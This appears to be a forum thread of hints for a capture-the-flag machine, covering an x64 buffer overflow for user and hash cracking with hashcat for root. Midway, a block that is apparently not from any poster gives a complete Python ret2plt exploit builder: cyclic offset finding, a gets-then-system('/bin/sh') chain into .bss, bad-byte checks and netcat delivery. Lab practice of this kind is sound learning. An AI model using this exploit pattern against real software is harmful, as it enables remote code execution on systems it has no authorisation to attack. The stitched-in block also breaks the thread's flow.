Much has been said on the exploit. Write the string you want to execute to a memory address you know is writable and doesn’t change. Refer to the memory layout. And no, it’s not the stack.
Root:
Only one of the 6 hashes is correct. And I don’t blame the creator for choosing that password because that pretty much sums up the whole ordeal. :lol:
■■■■, you’re definitely not wrong referring to the password. I had a massive “wtf” moment with that.
Fun box but I think RE + custom exploitation right off the bat for user might make this worth a few more points than “easy”. Root difficulty felt more appropriate.
User:
Use the source to find the very first foothold, it will point you to an interesting file.
Look into exploiting x64 Linux BOF for tutorials. All the libs needed to chain a payload are right in front of you. You can trick the program into asking for more. Trying to deliver a payload by file redirection is painful; there is a helpful python lib for pwning.
Root:
The box is pretty stripped down for setting up shop with the usual post-exploit tools. A handy low port is helpful if you add the key. All the files are right in front of you from user. 6 files; 6 hashes. Someone has mentioned --help on a certain tool to get the hashes; RTFM.
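The two hints above (write the command string to a fixed writable address, not the stack, and make the program "ask for more" input) describe a classic two-stage x64 ret2plt chain. The script below is an added example, not code from the box or from anyone in this thread, and every address in it is a made-up placeholder for a hypothetical non-PIE binary: the offset, the `pop rdi ; ret` gadget, `gets@plt`, `system@plt` and the `.bss` slot all have to be replaced with what `objdump -d`, a gadget finder and `readelf -S` report for the real target. It also includes a de Bruijn pattern helper for finding the offset, and a check for bytes that would truncate the input on the way in.

```python
import itertools
import string
import struct


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value, as it must appear on the stack."""
    return struct.pack("<Q", value)


# --- 1. Finding the offset to the saved return address ----------------------
def cyclic(length: int, alphabet: bytes = string.ascii_lowercase.encode(), n: int = 4) -> bytes:
    """De Bruijn sequence: every n-byte window is unique, so the bytes that land
    in the saved RIP (or that RSP points at after the crash) identify the offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq: list = []

    def db(t: int, p: int) -> None:          # standard FKM construction
        if len(seq) >= length:
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq[:length])


def cyclic_find(window: bytes, search_len: int = 0x10000) -> int:
    """Offset of a 4-byte window pulled out of the crash (e.g. from `x/s $rsp`)."""
    return cyclic(search_len).find(window[:4])


# --- 2. Building the two-stage chain ----------------------------------------
# Hypothetical addresses for an x64, non-PIE binary. None come from the box.
OFFSET_TO_RET = 72          # bytes from buffer start to saved RIP (from cyclic_find)
POP_RDI_RET   = 0x4007c3    # gadget: pop rdi ; ret
RET           = 0x4007c4    # lone ret: keeps rsp 16-byte aligned before system()
GETS_PLT      = 0x400560    # gets@plt, the "ask for more" primitive
SYSTEM_PLT    = 0x400570    # system@plt (a libc leak is not needed for this route)
BSS_BUF       = 0x601080    # writable, non-randomised .bss slot for the command


def build_stage1(offset: int = OFFSET_TO_RET) -> bytes:
    """Overflow, then gets(BSS_BUF) to fetch the command, then system(BSS_BUF)."""
    chain = b"A" * offset
    chain += p64(POP_RDI_RET) + p64(BSS_BUF) + p64(GETS_PLT)     # gets(BSS_BUF)
    chain += p64(RET)                                            # realign stack
    chain += p64(POP_RDI_RET) + p64(BSS_BUF) + p64(SYSTEM_PLT)   # system(BSS_BUF)
    return chain


def build_stage2(cmd: bytes) -> bytes:
    """Second line of input: consumed by our injected gets() call into .bss."""
    if b"\n" in cmd:
        raise ValueError("gets() stops at the first newline")
    return cmd + b"\n"


def bad_bytes(payload: bytes, bad: bytes = b"\n") -> list:
    """Offsets of bytes that would cut the input short. For gets()/read() only
    newline matters; the high NUL bytes of every x64 address are tolerated there,
    but would break a strcpy()-style overflow (add b"\\x00" to `bad` for that)."""
    return [i for i, b in enumerate(payload) if b in bad]


def full_input(cmd: bytes = b"/bin/sh") -> bytes:
    """Stage 1 terminated by the newline the vulnerable gets() wants, then stage 2."""
    stage1 = build_stage1()
    if bad_bytes(stage1):
        raise ValueError("chain contains a byte that truncates input: %r" % bad_bytes(stage1))
    return stage1 + b"\n" + build_stage2(cmd)


if __name__ == "__main__":
    # Write the bytes to a file instead of typing them on the fly; feed with
    # `(cat exploit.bin; cat) | nc $HOST $PORT` so stdin stays open for the shell.
    with open("exploit.bin", "wb") as f:
        f.write(full_input())
```

If `system()` dies on a `movaps` instruction inside libc, the stack is misaligned at the call: drop or duplicate the lone `ret` gadget. The same chain ports directly to pwntools (`p64`, `cyclic`, `cyclic_find`, `process`/`remote`), which also avoids the file-redirection pain mentioned above.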
@Ripc0rd said:
Can anyone throw me a hint on root? Hashcat went through the whole rockyou and turned up blank?
If you have only 1 hash then you’re missing some information on how this app works.
Read about various ways and see how you can produce more than 1 hash.
When you have this you'll get the creds really quickly
got 6 hashes, but still not getting anything back?
Ok, I actually took some time to explore and found out that hashcat expects a slightly different format for the hash depending on the type of encryption and whether a certain feature was used.
See the example hashes page (example_hashes) on the hashcat wiki and you'll figure out what you need to change in the hash for hashcat to work as well.
I guess the creator of the tool didn't care about hashcat
Finally got root!!
User was a little brainfuck for me since I was new to binary exploitation.
Root: learned about a certain app,
thanks to @Ripc0rd @keyos1 @Kucharskov @rewks for nudges.
Had problems getting the exploit to work properly despite being verified by some users. Ended up having to do it manually and I’d love to know why my original code didn’t work if you’re up for debugging it with me. PM Me
Finally root!!! What a journey… About 12 hours for user and only about 15 minutes for root… Thx to all the nice people here who helped me immensely in getting user. Special shoutout to @toka @jimmypw and @Kucharskov You guys really rock the show!
User:
ippsec has a great video from 2015 about another CTF challenge which helps you a lot!!!
Add the exploit to a file and execute it afterwards. Don’t do it on the fly via cli. This cost me maybe more than 2 hours.
Find a way to exploit via leet port
Leave an entry point
Root:
Everything already said. Everything you’ll need is right in front of you. Maybe the easiest root I’ve ever had!
Feel free to send me a PM, if you need some hints.
I really liked this box at least for the user. Learnt a lot of things about advanced BOF.
The frustrating part is that we could not use the libc leak method remotely (through nc), but locally it works fine.
Of course, since it's an easy box, you don't have to go through a libc leak but can just use what is in front of you on m***p, but if you want to extend your skillz I recommend you try the hard method anyway.
Would love to chat with someone who has completed the bin ex. I have it working but I am struggling to understand why it's working. If you have a good understanding of it and can spare a few minutes please let me know.
Hello,
It is my first time attempting an active machine. I couldn't figure out what to do after nmap. I tried logging in to SSH using user & root, but it is all password protected. Can anyone PM me the right direction on how to proceed further.
I’m happy to help anyone if you have specific questions about the binex feel free to message me. In the interest of efficiency, though, it will probably be pretty beneficial for both of us if you’ve watched some of the videos or read some of the webpages linked in this post. If you message me saying “any hints for binex” or similar, that’s what I’m going to tell you.